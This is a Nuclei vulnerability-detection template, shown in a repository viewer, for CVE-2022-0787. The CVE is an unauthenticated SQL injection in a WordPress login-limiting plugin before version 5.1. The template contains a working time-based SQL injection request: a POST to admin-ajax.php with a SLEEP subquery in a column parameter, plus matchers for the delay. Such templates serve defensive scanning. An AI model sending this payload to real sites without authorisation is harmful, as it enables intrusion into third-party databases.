nuclei-templates/http/cves/2022/CVE-2022-0787.yaml

49 lines
1.9 KiB
YAML
Raw Normal View History

2023-10-17 07:20:28 +00:00
id: CVE-2022-0787
info:
name: Limit Login Attempts (Spam Protection) < 5.1 - SQL Injection
author: theamanrawat
severity: critical
description: |
The Limit Login Attempts (Spam Protection) WordPress plugin before 5.1 does not sanitise and escape some parameters before using them in SQL statements via AJAX actions (available to unauthenticated users), leading to SQL Injections.
remediation: Fixed in version 5.1
reference:
- https://wpscan.com/vulnerability/69329a8a-2cbe-4f99-a367-b152bd85b3dd
- https://wordpress.org/plugins/wp-limit-failed-login-attempts/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0787
- https://github.com/cyllective/CVEs
2023-10-17 07:20:28 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0787
cwe-id: CWE-89
2024-05-31 19:23:20 +00:00
epss-score: 0.04032
epss-percentile: 0.92073
cpe: cpe:2.3:a:limit_login_attempts_project:limit_login_attempts:*:*:*:*:*:wordpress:*:*
2023-10-17 07:20:28 +00:00
metadata:
verified: true
max-request: 1
vendor: limit_login_attempts_project
product: limit_login_attempts
framework: wordpress
2024-01-14 09:21:50 +00:00
tags: cve,cve2022,wpscan,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts,limit_login_attempts_project
2023-10-17 07:20:28 +00:00
http:
- raw:
- |
@timeout: 15s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=WPLFLA_get_log_data&order[][column]=0&columns[][data]=(SELECT+7382+FROM+(SELECT(SLEEP(6)))ameU)
matchers:
- type: dsl
dsl:
- duration>=6
- status_code == 200
2023-11-26 11:25:51 +00:00
- contains(header, "text/html")
2023-10-17 07:20:28 +00:00
- contains(body, 'iTotalDisplayRecords')
condition: and
# digest: 4a0a00473045022100df4f7156bb701e694be126c2abe6eb09e5622b1cead273ab0e888a73d87dce8a02206a9b7211d792d45b6daaee2e7c7258fb8bcae7c9f8266b6b0312c01be218ec65:922c64590222798bb761d5b6d8e72950